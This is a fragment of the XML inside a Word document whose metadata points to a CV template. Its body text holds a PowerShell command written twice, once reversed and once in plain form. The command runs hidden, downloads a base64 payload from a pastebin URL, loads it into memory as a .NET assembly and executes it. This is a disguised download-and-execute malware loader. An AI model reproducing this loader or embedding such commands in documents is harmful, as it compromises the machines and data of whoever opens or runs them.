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657E" w:rsidRDefault="00E9657E">
      <w:r>
        <w:t>)llun$,llun$(ekovni.tnioPyrtnE.)))'vS2YtaF5/war/moc.nibetsap//:sptth'(gnirtsdaolnwoD.)tneilCbeW.teN.metsyS tcejbO-weN((gnirtS46esabmorF::]trevnoC[(daoL.niamoDtnerruC::]niamoDppA[ tixeon- ogolon- neddih elytswodniw- exe.llehSrewoP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9657E" w:rsidRDefault="00E9657E">
      <w:r>
        <w:t>PowerShell.exe -windowstyle hidden -nologo -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/5FatY2Sv'))).EntryPoint.invoke($null,$null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9657E" w:rsidRDefault="00E9657E"/>
    <w:p w:rsidR="00E9657E" w:rsidRDefault="00E9657E"/>
    <w:sectPr w:rsidR="00E965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655"/>
    <w:rsid w:val="0003559D"/>
    <w:rsid w:val="000A2FD9"/>
    <w:rsid w:val="000E7D75"/>
    <w:rsid w:val="00111910"/>
    <w:rsid w:val="00274621"/>
    <w:rsid w:val="00566138"/>
    <w:rsid w:val="006012F5"/>
    <w:rsid w:val="006E124C"/>
    <w:rsid w:val="00772E6C"/>
    <w:rsid w:val="007F60E0"/>
    <w:rsid w:val="008034FE"/>
    <w:rsid w:val="008B1C0E"/>
    <w:rsid w:val="009706C9"/>
    <w:rsid w:val="009B26FC"/>
    <w:rsid w:val="00AA72F4"/>
    <w:rsid w:val="00B0206C"/>
    <w:rsid w:val="00C72655"/>
    <w:rsid w:val="00D51AC0"/>
    <w:rsid w:val="00D72180"/>
    <w:rsid w:val="00D8044A"/>
    <w:rsid w:val="00DB5CA3"/>
    <w:rsid w:val="00E9657E"/>
    <w:rsid w:val="00F67842"/>
    <w:rsid w:val="00F74A9E"/>
    <w:rsid w:val="00FA043D"/>
    <w:rsid w:val="00FD68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TemplateCV.dotm</Template>
  <TotalTime>194</TotalTime>
  <Pages>1</Pages>
  <Words>68</Words>
  <Characters>394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Kira</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kira</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-12T13:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-19T08:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>